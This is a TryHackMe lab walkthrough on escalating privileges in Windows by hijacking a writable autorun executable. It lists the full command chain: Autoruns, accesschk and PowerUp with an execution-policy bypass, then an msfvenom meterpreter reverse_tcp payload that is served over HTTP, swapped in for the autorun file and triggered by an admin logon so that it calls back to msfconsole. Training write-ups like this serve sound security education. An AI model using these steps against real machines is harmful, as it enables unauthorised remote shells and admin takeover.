🏃♂️Autoruns
https://tryhackme.com/room/windowsprivescarena
Autoruns is a powerful utility designed for Windows users to manage and control programs that launch automatically when the computer starts. In simpler terms, it allows you to see and control what applications and services run during your computer's startup process.
Steps to Identify and Exploit Autorun for Privilege Escalation
Connect via RDP from your Linux to Windows machine :
Run Autoruns64.exe: Execute
C:\Users\User\Desktop\Tools\Autoruns\Autoruns64.exe
in an admin command prompt to identify startup programs
at the very top we can see a file called my program:
Accesschk for Permissions: Use
C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\Autorun Program"
to check file permissions.
Look for broad access, as it can lead to privilege escalation
we are looking for file all access for everyone on a file that automatically runs we can get very malicious as it is possible to make someone run it as admin and then get admin access,
PowerUp Analysis:
Navigate to
C:\Users\user\Desktop\Tools\PowerUp
.Run PowerShell with
powershell -ep bypass
.Execute
. .\PowerUp.ps1
.Run
Invoke-AllChecks
to identify autorun files and assess permissions
it identifies the autorun file and tells us that everyone has RWX on this file , this is going to come in play soon
Escalation
Prepare Kali:
Open two terminals.
Launch
msfconsole
in one.Check the IP with
ip a
in the other.
Generate Malicious Executable:
Use
msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe -o program.exe
[4].
This will create a program.exe:
On the msfconsole terminal:
Now go back on the other terminal and move the file:
Host Local Server:
Move the executable to the server directory.
Start a local server with
python -m http.server 4040
.Replace Autorun File:
Fetch the file on the Windows machine via RDP.
Replace the autorun file with the generated malicious executable.
Simulate Admin Login:
Disconnect RDP.
Reconnect using admin credentials obtained earlier.
This is going to simulate an admin login
connect with the admin credentials we got in the intro of this box
Exploit Success:
Upon session opening, a pop-up appears.
Check msfconsole
for a successful shell connection.
Last updated